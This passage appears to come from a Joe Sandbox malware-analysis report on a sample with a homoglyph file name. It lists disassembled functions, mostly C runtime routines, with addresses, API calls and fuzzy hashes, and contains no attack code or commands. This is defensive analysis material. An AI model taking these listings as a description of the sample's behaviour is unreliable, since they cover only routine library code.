Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 46aad9f5fc8abdd083fbe1cb7f2bc539f47cd27e161805c56eef805bd6707dc0
Instruction ID: 1ccbb858d71bf74cff855464dfda12129807db7b8fa139d31b476df6254f8cd3
Opcode Fuzzy Hash: 46aad9f5fc8abdd083fbe1cb7f2bc539f47cd27e161805c56eef805bd6707dc0
Instruction Fuzzy Hash: B1B13835A11609CFD704CF28C486B957BA0FF45369F26C658E8AACF6B1C335E982CB40

Function 6CDD1D98 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDD1DAE

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5a6b709c9240fde0c670f738fab843d635d6dc2e6935a81cf3fa2aa09adcefed
Instruction ID: 23d3a87275d7f55f73b9d2156ea60c72c4e4d50bf9088ccb9da4de3deddb9006
Opcode Fuzzy Hash: 5a6b709c9240fde0c670f738fab843d635d6dc2e6935a81cf3fa2aa09adcefed
Instruction Fuzzy Hash: EF516FB2E01616CFEB08CF65C88179ABBF0FB49764F25896AD455EB650D378E900CF90

Function 005438B0 Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

0, xrefs: 00543928

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6dbc7a817f029638db7c2ad2469da9e09998ece389b35f285a111443c669f18b
Instruction ID: b3c92ad337c4bb88f6a3d2e66c469a9c91415fb0075a056707bff97223aa698e
Opcode Fuzzy Hash: 6dbc7a817f029638db7c2ad2469da9e09998ece389b35f285a111443c669f18b
Instruction Fuzzy Hash: 9D914C37E1999147D7188E7C4C413E97E62AB97334F2D83B9DCB1973E5C2698E068390

Function 005183B0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 005184E6

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 8b5af7b338855678a260b67441181896d7c7f80f72a1dc7c660094924f1e74f9
Instruction ID: 1c8e819c7a87f86848228553dba666302cf444743daf4402029a7cd10ce3e1a0
Opcode Fuzzy Hash: 8b5af7b338855678a260b67441181896d7c7f80f72a1dc7c660094924f1e74f9
Instruction Fuzzy Hash: 4CB138711083819FD325CF18C88466BBFE0AFA9708F444E2DE5D997382D671E958CB67

Function 0052F110 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

/AG, xrefs: 0052F1E2

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: /AG
API String ID: 0-429173468
Opcode ID: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
Instruction ID: 19355c3563b6decd6e17f41c518043b2dfb013fe7c8170f6e733a8f7f1818990
Opcode Fuzzy Hash: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
Instruction Fuzzy Hash: 336133B6610B118BD324CF25D891663BBF2FFD3314B49992CC4D68BA95E778B806CB50

Function 00552860 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

@, xrefs: 005528CD

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 7ec14b1a9585c448c699c38ab10fe0aa2ad1a543d96d8fca562bcbf6b5dc87d4
Instruction ID: 1e80f3644be9c27b3bcc81ccef9dac8d096cd2ff018d2bac753c5471e3c028f3
Opcode Fuzzy Hash: 7ec14b1a9585c448c699c38ab10fe0aa2ad1a543d96d8fca562bcbf6b5dc87d4
Instruction Fuzzy Hash: 9031FF716083089BC314DF68D8D166BFBF4FF8B344F05882DE98887390E37099488B96

Function 6CDD613E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CDD613E

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7f8523cfbdca381f97c52d432f5540170b182dd21c3c8eefb024436658760b20
Instruction ID: 799c0708ede9e5c6cb78b166bfd8642e942f4003a60cd918e197407ebd0140a4
Opcode Fuzzy Hash: 7f8523cfbdca381f97c52d432f5540170b182dd21c3c8eefb024436658760b20
Instruction Fuzzy Hash: EEA01130B002208BAB008E30828AB0A3BF8EA82280B08822AA000C0000EB2C8080AB80

Function 00532DF0 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742b48849c1e11f22bef16670be6564fdd31cfa55204fcfcb013f01fc1ce642f
Instruction ID: 3aa6b32799a42a389d79e672250e862df93a4fedc4c612667f943c7a31f08057
Opcode Fuzzy Hash: 742b48849c1e11f22bef16670be6564fdd31cfa55204fcfcb013f01fc1ce642f
Instruction Fuzzy Hash: C5726C71508F818ED3328F3D8889796BFD56B5A324F088A5DD1FA8B3C2C7B96105C766

Function 6CDC1000 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db55ed65fbe2ecf1a612635444ad316c06479d6ce812981382e063f83aa73b1e
Instruction ID: 4a130ed5482d303952344f668848b21d3098b371e676df7ca10fe75df52c3588
Opcode Fuzzy Hash: db55ed65fbe2ecf1a612635444ad316c06479d6ce812981382e063f83aa73b1e
Instruction Fuzzy Hash: 8AA11336B44265CFCF04CFBCC4913DEBBF9AB4A358F108116E465E7B60C22AD9098B56

Function 005310E0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f945403ecbe07682ad937ee94bd2165b265485f7ec6e19aad66908354466a1b3
Instruction ID: 0cbc1fda8abc724f99ea8690ddfd075986276de06381220a20f3aaedfe0ecd94
Opcode Fuzzy Hash: f945403ecbe07682ad937ee94bd2165b265485f7ec6e19aad66908354466a1b3
Instruction Fuzzy Hash: B3812536A046614FCB228E38885036ABFE1BB95364F19C67DE8B9CB392D634CC45C3C1

Function 0052EE60 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e574b59e77aa92d82939a69e6f381b8f293f4bc18f304c105db34e19d70d5e43
Instruction ID: 75f123411aba3680a4af6f0bf4fd300d052abe2da9b16527ee74b08230dbf1a0
Opcode Fuzzy Hash: e574b59e77aa92d82939a69e6f381b8f293f4bc18f304c105db34e19d70d5e43
Instruction Fuzzy Hash: 65712737B195A14BD7148D3C6C962AAAE532FD733473E8379D9B59B3D2CA368D024340

Function 00549FE0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a380f5dc1015369e5d36fe1e74030a71b35efddb49622b43951d89b320ed9838
Instruction ID: 195ba13b92d5b6d85cc48c4a6e982df52d087dbb8740c597961ce94d494cbb5b
Opcode Fuzzy Hash: a380f5dc1015369e5d36fe1e74030a71b35efddb49622b43951d89b320ed9838
Instruction Fuzzy Hash: 78514BB15087548FE314DF69D89475BBBE1BBC8318F044A2DE4E987351E379DA088B82

Function 004F8B67 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0450f2eadb08f27bfff926aa74b3c2acd30d389b218c6601a8f7cc26ac0891
Instruction ID: 38a65575f853a4d31a0bdb224262a5bf5d0665e46f5bed8744db279a38d40d7a
Opcode Fuzzy Hash: 6a0450f2eadb08f27bfff926aa74b3c2acd30d389b218c6601a8f7cc26ac0891
Instruction Fuzzy Hash: 912192C250D5C911B76A81B8E8452C99F2225634701FD0BBFD2436A7A38EDBCCD7C115

Function 004F8B96 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76802b93250662603ba4b76ca3674e0ccea2824d8416913193f492fc27d3feb5
Instruction ID: 799fc3ebeb199df7f58ab5205c0d6bbf9c0dcd830c9899a6aafc969f771a6ee7
Opcode Fuzzy Hash: 76802b93250662603ba4b76ca3674e0ccea2824d8416913193f492fc27d3feb5
Instruction Fuzzy Hash: 6A2172C290D98911BB6A81B8D8492C5DF2225624701FD0BBFD243AA7A28EE7CCD7C115

Function 0051B040 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
Instruction ID: f7e3acfea1ab3fea910d867ea94b90ec71d33c5fac3674657d0736fc6f03cb85
Opcode Fuzzy Hash: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
Instruction Fuzzy Hash: 7221C733A636184BE310CD69CC807957696A7DD338F3E47B889744B7D2D97B6D138680

Function 6CDD4529 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: c3a376695253bf4078df83bf2b5424d4ad27b67fcbbde77ceca6cee1b1921d7d
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: 8FE0EC72D26228EBCB15DF9CC944A9AB3ECEB45B54B1245A6B516D3621D270EE00CBD0

Function 6CDD6F1A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6CDD6F5E

Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E64
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E76
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E88
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8E9A
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EAC
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EBE
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8ED0
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EE2
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8EF4
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F06
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F18
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F2A
Part of subcall function 6CDD8E47: _free.LIBCMT ref: 6CDD8F3C

_free.LIBCMT ref: 6CDD6F53

Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B

_free.LIBCMT ref: 6CDD6F75
_free.LIBCMT ref: 6CDD6F8A
_free.LIBCMT ref: 6CDD6F95
_free.LIBCMT ref: 6CDD6FB7
_free.LIBCMT ref: 6CDD6FCA
_free.LIBCMT ref: 6CDD6FD8
_free.LIBCMT ref: 6CDD6FE3
_free.LIBCMT ref: 6CDD701B
_free.LIBCMT ref: 6CDD7022
_free.LIBCMT ref: 6CDD703F
_free.LIBCMT ref: 6CDD7057

Strings

@l, xrefs: 6CDD7006

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: @l
API String ID: 161543041-4025332666
Opcode ID: 3ed15d053062447d99b5ed97fb42c68b53dbfc48da722fc53bdc2a3f79136397
Instruction ID: dcccb129da85af74d762c44945a978fffac516ef0946cff790cafcc5e23d16ea
Opcode Fuzzy Hash: 3ed15d053062447d99b5ed97fb42c68b53dbfc48da722fc53bdc2a3f79136397
Instruction Fuzzy Hash: BE319031E04700EFE7214B75D804B9AB3F9AF00358F22486AE064D7AB4DB31F985C761

Function 6CDD40F3 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CDD4109

Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B

_free.LIBCMT ref: 6CDD4115
_free.LIBCMT ref: 6CDD4120
_free.LIBCMT ref: 6CDD412B
_free.LIBCMT ref: 6CDD4136
_free.LIBCMT ref: 6CDD4141
_free.LIBCMT ref: 6CDD414C
_free.LIBCMT ref: 6CDD4157
_free.LIBCMT ref: 6CDD4162
_free.LIBCMT ref: 6CDD4170

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8c32475bf07080966653573cf14eed91620dd951c697c7a0c4bc743ec4a5ea65
Instruction ID: ea26c10f788c820b7aaec02716732efdddd83070a165bd195df5ff891b698bb8
Opcode Fuzzy Hash: 8c32475bf07080966653573cf14eed91620dd951c697c7a0c4bc743ec4a5ea65
Instruction Fuzzy Hash: 2B21BA76D04108AFCB41DFA4C894DDDBBB9BF08244F414166E915DB731DB71EA89CB90

Function 6CDD26D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6CDD2707
___except_validate_context_record.LIBVCRUNTIME ref: 6CDD270F
_ValidateLocalCookies.LIBCMT ref: 6CDD2798
__IsNonwritableInCurrentImage.LIBCMT ref: 6CDD27C3
_ValidateLocalCookies.LIBCMT ref: 6CDD2818

Strings

csm, xrefs: 6CDD27AD

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bacfd2db2ac699017f48401a91a39097ebce5dcefcc8866042e1d78cdff7f209
Instruction ID: 357fcec65c3c36a2970918dc55e3e80e3ecacc6459931f8b7e70352b9cb05e8a
Opcode Fuzzy Hash: bacfd2db2ac699017f48401a91a39097ebce5dcefcc8866042e1d78cdff7f209
Instruction Fuzzy Hash: BE41B334E01219EBCF10DF68C888A9E7BB5EF4532CF168195E8149B761D735BD05CBA0

Function 6CDD5D5A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 6CDD5DB1
ext-ms-, xrefs: 6CDD5DC5

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 81f436bf7030f3acee861998b3b5ef50476a393eb019bc61d74e2d9774145803
Instruction ID: 1d74ff950588e3654d41d838ec2dd4c0bae081eabd098c06fdfb461cdd3a501d
Opcode Fuzzy Hash: 81f436bf7030f3acee861998b3b5ef50476a393eb019bc61d74e2d9774145803
Instruction Fuzzy Hash: 7021A8B1E49222EBDB115F698C44B5A3778DF42768F270611E955AB6A0F630F90087F0

Function 6CDD8FE6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CDD8FAE: _free.LIBCMT ref: 6CDD8FD3

_free.LIBCMT ref: 6CDD9034

Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B

_free.LIBCMT ref: 6CDD903F
_free.LIBCMT ref: 6CDD904A
_free.LIBCMT ref: 6CDD909E
_free.LIBCMT ref: 6CDD90A9
_free.LIBCMT ref: 6CDD90B4
_free.LIBCMT ref: 6CDD90BF

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dba89b370ee39ac0f45967c0e0b134501bc874e19b3d39271a970ecfa01c269e
Instruction ID: dc174ab35011b60c8398353a6b646aed23c2ed9455193f4c5a68d7e970c2b599
Opcode Fuzzy Hash: dba89b370ee39ac0f45967c0e0b134501bc874e19b3d39271a970ecfa01c269e
Instruction Fuzzy Hash: 03116371D40B44BAD531ABB0CC09FCBF7DE6F40714F420826A299A6B70DB75B54987A1

Function 6CDD80FF Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CDD8147
__fassign.LIBCMT ref: 6CDD832C
__fassign.LIBCMT ref: 6CDD8349
WriteFile.KERNEL32(?,6CDD68E5,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDD8391
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDD83D1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDD8479

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: e8efb7948f54c4ee52524da96c73b06f3b8ce5dfb01e34ec6b9f3bcc46d9d359
Instruction ID: 80d9c0b9ef3f06f586af8bb8832a7ddce7137e6a605ee03e418c6a21a5140933
Opcode Fuzzy Hash: e8efb7948f54c4ee52524da96c73b06f3b8ce5dfb01e34ec6b9f3bcc46d9d359
Instruction Fuzzy Hash: 4FC19E71D012589FCB06CFE8C880AEDFBB9EF09314F29516AD855B7751D231A906CFA0

Function 6CDD2BA7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CDD2875,6CDD19A0,6CDD13B9,?,6CDD15F1,?,00000001,?,?,00000001,?,6CDE1120,0000000C,6CDD16EA), ref: 6CDD2BB5
